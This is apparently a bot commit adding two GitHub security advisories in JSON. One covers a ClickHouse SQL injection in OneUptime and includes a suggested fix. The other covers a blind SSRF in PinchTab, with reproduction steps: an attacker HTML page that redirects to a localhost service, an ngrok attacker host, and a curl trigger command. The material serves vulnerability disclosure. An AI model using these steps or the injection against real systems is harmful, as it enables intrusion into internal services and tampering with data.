Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 8011175ae211 · 2026-03-18T16:36:18.000Z
GHSA-gcg3-c5p2-cqgg GHSA-qwxp-6qf9-wr4m
diff --git a/advisories/github-reviewed/2026/03/GHSA-gcg3-c5p2-cqgg/GHSA-gcg3-c5p2-cqgg.json b/advisories/github-reviewed/2026/03/GHSA-gcg3-c5p2-cqgg/GHSA-gcg3-c5p2-cqgg.json
@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-gcg3-c5p2-cqgg",
+  "modified": "2026-03-18T16:34:18Z",
+  "published": "2026-03-18T16:34:18Z",
+  "aliases": [
+    "CVE-2026-33142"
+  ],
+  "summary": "OneUptime ClickHouse vulnerable to SQL Injection via unvalidated column identifiers in sort, select, and groupBy parameters",
+  "details": "The fix for GHSA-p5g2-jm85-8g35 (ClickHouse SQL injection via aggregate query parameters) added column name validation to the `_aggregateBy` method but did not apply the same validation to three other query construction paths in `StatementGenerator`. The `toSortStatement`, `toSelectStatement`, and `toGroupByStatement` methods accept user-controlled object keys from API request bodies and interpolate them as ClickHouse `Identifier` parameters without verifying they correspond to actual model columns.\n\nClickHouse Identifier parameters are substituted directly into queries without escaping, so an attacker who can reach any analytics list or aggregate endpoint can inject arbitrary SQL through crafted `sort`, `select`, or `groupBy` keys.\n\n## Details\n\n### Root cause\n\n`StatementGenerator.ts` has four methods that iterate over user-provided object keys to build SQL:\n\n| Method | Validates keys? |\n|--------|----------------|\n| `toWhereStatement` (line 292) | Yes - calls `this.model.getTableColumn(key)` |\n| `toSortStatement` (line 467) | **No** |\n| `toSelectStatement` (line 483) | **No** |\n| `toGroupByStatement` (line 451) | **No** |\n\nIn `Statement.ts`, when a value passed to the `SQL` tagged template is a string, it receives the `Identifier` data type (line 40). Per [ClickHouse documentation](https://clickhouse.com/docs/en/sql-reference/syntax#defining-and-using-query-parameters), Identifier parameters are substituted directly into the query without quoting or escaping. This is correct for trusted column names but unsafe for user input.\n\n### Input flow\n\n`BaseAnalyticsAPI.ts` deserializes `sort`, `select`, and `groupBy` directly from `req.body` (lines 239-253) and passes them to the service layer without column validation:\n\n```typescript\nsort = JSONFunctions.deserialize(req.body[\"sort\"]) as Sort<AnalyticsDataModel>;\nselect = JSONFunctions.deserialize(req.body[\"select\"]) as Select<AnalyticsDataModel>;\ngroupBy = JSONFunctions.deserialize(req.body[\"groupBy\"]) as GroupBy<AnalyticsDataModel>;\n```\n\n### Affected endpoints\n\nAny endpoint backed by `BaseAnalyticsAPI.getList()` or `BaseAnalyticsAPI.getAggregate()` - this includes analytics queries for logs, metrics, spans, and exceptions.\n\n## Impact\n\nAn authenticated user can inject arbitrary ClickHouse SQL through crafted column names in sort, select, or groupBy request parameters. This allows reading, modifying, or deleting analytics data (logs, metrics, traces) stored in ClickHouse. PostgreSQL data is not affected (separate query path).\n\n## Suggested Fix\n\nAdd the same `getTableColumn()` validation already present in `toWhereStatement` to the three unvalidated methods:\n\n```typescript\n// toSortStatement, toSelectStatement, toGroupByStatement\nfor (const key in sort) {\n  if (!this.model.getTableColumn(key)) {\n    throw new BadDataException(`Unknown column: ${key}`);\n  }\n  // existing logic\n}\n```\n\nThis matches the pattern used in the GHSA-p5g2 fix for `_aggregateBy` and the existing `toWhereStatement` validation.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "oneuptime"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "10.0.34"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-gcg3-c5p2-cqgg"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/OneUptime/oneuptime"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-18T16:34:18Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-qwxp-6qf9-wr4m/GHSA-qwxp-6qf9-wr4m.json b/advisories/github-reviewed/2026/03/GHSA-qwxp-6qf9-wr4m/GHSA-qwxp-6qf9-wr4m.json
@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-qwxp-6qf9-wr4m",
+  "modified": "2026-03-18T16:34:00Z",
+  "published": "2026-03-18T16:34:00Z",
+  "aliases": [
+    "CVE-2026-33081"
+  ],
+  "summary": "PinchTab has a Blind SSRF via browser-side redirect bypass in /download URL validation",
+  "details": "### **The /download endpoint validates only the initial URL provided by the user using validateDownloadURL() to prevent requests to internal or private network addresses.**\n\nExploitation requires \\security.allowDownload=true`, which is disabled by default.`\n\nHowever, pages loaded by the embedded Chromium browser can trigger additional browser-side requests (for example, JavaScript redirects, navigations, or resource requests) after the initial validation step.\n\nBecause the validation is only applied to the initial URL and not to subsequent browser-issued request targets, an attacker-controlled page can cause the browser to issue requests to internal network services reachable from the PinchTab host.\n\nThis results in a blind Server-Side Request Forgery (SSRF) condition in which internal-only services may be accessed and state-changing endpoints may be triggered without returning the response body to the attacker.\n\n\n### **Steps to Reproduce:**\n\n**Environment Setup**\nTarget: PinchTab server (tested on v0.8.x, v0.7.x)\nAttacker-controlled server: Publicly accessible (e.g., via ngrok) [attacker.py](https://github.com/user-attachments/files/26013554/att.py)\nInternal service: Runs on the same host as PinchTab and is not externally accessible [internal_service.py](https://github.com/user-attachments/files/26013551/internal.py)\n\n**1. Start a Local Internal Service (Victim Side)**\n\nRun a simple HTTP service bound to localhost: [internal_service.py](https://github.com/user-attachments/files/26013551/internal.py)\n    \n    python internal_service.py\n    \n    #Example behavior of internal_service.py:\n    #Listens on 127.0.0.1:1337\n    #Exposes endpoint /increment\n    #Increments a counter and logs requests\n    \n    #Expected output when accessed:\n    #COUNTER INCREMENTED: 1\n    #COUNTER INCREMENTED: 2\n\n**2. Host an Attacker-Controlled Page (Attacker side)**\n\nDeploy a malicious HTML page that redirects to the internal service: [attacker.py](https://github.com/user-attachments/files/26013554/att.py)\n\n    <html>\n    <body>\n    <script>\n    setTimeout(function(){\n        window.location = \"http://127.0.0.1:1337/increment\";\n    }, 1500);\n    </script>\n    </body>\n    </html>\nHost this page on a publicly accessible server (e.g., using ngrok): https://fcb8-180-149-93-3.ngrok-free.app\n\n\n**3. Trigger the Vulnerable Endpoint (Attacker side)**\n\nSend a request to the PinchTab /download endpoint:\n\n    curl \"http://[server-ip]:9867/download?url=https://fcb8-180-149-93-3.ngrok-free.app\"\n\nIf a server token is configured, the request must include valid authentication.\n\n**4. Observe Server-Side Request to Localhost**\n\nWhen PinchTab processes the request:\n1. It launches a headless Chromium instance\n2. The browser loads the attacker-controlled page\n3. JavaScript executes within the browser\n4. The browser redirects to: http://127.0.0.1:1337/increment\n\n\n**5. Verify the Impact**\n\nCheck the output of internal_service.py:\n   <img width=\"718\" height=\"156\" alt=\"proof\" src=\"https://github.com/user-attachments/assets/cf00e3e6-71c6-44ae-83b0-ed819f19ee9a\" />\n\nCOUNTER INCREMENTED: 1\n   <img width=\"718\" height=\"282\" alt=\"proof_incremented\" src=\"https://github.com/user-attachments/assets/98281b8e-221b-4e76-a10b-1b2335d08c61\" />\n\n**This confirms that the request originated from the PinchTab host and that an attacker can successfully access localhost-only internal services via the browser, despite the initial URL validation.**\n\n\n### **Impact**\nThis vulnerability allows an attacker to bypass the /download URL validation and cause the embedded Chromium browser to make requests to internal network services. By hosting a page that performs a redirect after the initial validation, an attacker can force the browser to access resources such as 127.0.0.1 or other private network addresses reachable from the PinchTab host.\n\nAlthough the response is not returned to the attacker (blind SSRF), this behavior can still be used to interact with internal services and trigger state-changing endpoints. In environments where sensitive services or cloud metadata endpoints are accessible from the host, this could lead to more serious security impact.\n\n### **Mitigation**\nApply the same URL safety policy to every browser-issued request in the `/download` flow, not only the initial user-supplied URL, and block requests to loopback, private, link-local, and other non-public network ranges inside the Chromium browser context.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/pinchtab/pinchtab"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.8.3"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.8.2"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-qwxp-6qf9-wr4m"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/pinchtab/pinchtab"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-18T16:34:00Z",
+    "nvd_published_at": null
+  }
+}
